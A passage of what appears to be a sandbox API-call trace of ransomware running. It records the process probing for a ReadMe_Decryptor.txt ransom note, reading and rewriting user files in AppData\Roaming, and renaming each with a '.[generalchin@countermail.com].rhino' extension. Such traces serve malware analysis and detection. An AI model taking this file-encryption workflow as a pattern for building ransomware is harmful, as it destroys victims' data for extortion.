RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0104.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0104.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0104.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xfIlkCQ8.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xfilkcq8.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.410] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x13807 [0104.410] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13927, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.410] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.410] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.411] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.412] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x13807, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x13807, lpOverlapped=0x0) returned 1 [0104.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.413] GetLastError () returned 0x0 [0104.413] SetLastError (dwErrCode=0x0) [0104.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1382a) returned 0x70a650 [0104.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x71de88 [0104.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71df90 [0104.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de88 | out: hHeap=0x6d0000) returned 1 [0104.415] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x71de88 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x71e118 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de88 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x71e1f8 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e118 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x71e340 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e1f8 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x71e528 [0104.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e340 | out: hHeap=0x6d0000) returned 1 [0104.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x71e7f8 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e528 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x71e118 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e7f8 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x71e760 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e118 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x71f0c8 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e760 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x71fee0 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f0c8 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x721420 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71fee0 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x71e118 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721420 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x7210b0 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e118 | out: hHeap=0x6d0000) returned 1 [0104.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0104.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7210b0 | out: hHeap=0x6d0000) returned 1 [0104.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x71e118 [0104.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0104.419] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e118 | out: hHeap=0x6d0000) returned 1 [0104.419] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0104.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0104.422] WriteFile (in: hFile=0x104, lpBuffer=0x781f80*, nNumberOfBytesToWrite=0x13927, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x781f80*, lpNumberOfBytesWritten=0x2cfa04*=0x13927, lpOverlapped=0x0) returned 1 [0104.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0104.422] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13927, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.422] CloseHandle (hObject=0x104) returned 1 [0104.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x71de88 [0104.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x71e118 [0104.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de88 | out: hHeap=0x6d0000) returned 1 [0104.425] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xfIlkCQ8.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xfilkcq8.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xfIlkCQ8.odp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xfilkcq8.odp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e118 | out: hHeap=0x6d0000) returned 1 [0104.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71df90 | out: hHeap=0x6d0000) returned 1 [0104.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0104.428] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0104.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.428] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0104.428] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0104.429] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.429] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xrTxPw8CKhYxpcSJV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xrtxpw8ckhyxpcsjv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.429] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x213b [0104.429] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x225b, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.442] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.442] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.443] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.444] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x213b, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x213b, lpOverlapped=0x0) returned 1 [0104.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.444] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.444] GetLastError () returned 0x0 [0104.444] SetLastError (dwErrCode=0x0) [0104.444] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x215e) returned 0x75ef78 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x7610e0 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7611e8 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7610e0 | out: hHeap=0x6d0000) returned 1 [0104.445] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0104.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7610e0 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x761370 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7610e0 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x761450 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761370 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x761598 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761450 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x761780 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761598 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x761a50 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761780 | out: hHeap=0x6d0000) returned 1 [0104.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x761370 [0104.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761a50 | out: hHeap=0x6d0000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7619b8 [0104.447] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761370 | out: hHeap=0x6d0000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x762320 [0104.447] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7619b8 | out: hHeap=0x6d0000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x763138 [0104.447] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762320 | out: hHeap=0x6d0000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x764678 [0104.447] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763138 | out: hHeap=0x6d0000) returned 1 [0104.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x761370 [0104.447] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764678 | out: hHeap=0x6d0000) returned 1 [0104.449] WriteFile (in: hFile=0x104, lpBuffer=0x761380*, nNumberOfBytesToWrite=0x225b, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x761380*, lpNumberOfBytesWritten=0x2cfa04*=0x225b, lpOverlapped=0x0) returned 1 [0104.449] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761370 | out: hHeap=0x6d0000) returned 1 [0104.450] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x225b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.450] CloseHandle (hObject=0x104) returned 1 [0104.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0104.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7610e0 [0104.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.451] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xrTxPw8CKhYxpcSJV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xrtxpw8ckhyxpcsjv.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xrTxPw8CKhYxpcSJV.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xrtxpw8ckhyxpcsjv.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7610e0 | out: hHeap=0x6d0000) returned 1 [0104.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7611e8 | out: hHeap=0x6d0000) returned 1 [0104.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0104.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0104.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0104.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ZNdVz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zndvz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.453] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1578f [0104.453] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x158af, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.453] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.453] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.455] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.455] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1578f, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1578f, lpOverlapped=0x0) returned 1 [0104.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.456] GetLastError () returned 0x0 [0104.456] SetLastError (dwErrCode=0x0) [0104.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x157b2) returned 0x70a650 [0104.460] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.460] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x71fe10 [0104.460] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71ff18 [0104.460] HeapFree (in: hHeap=0x6d0000, 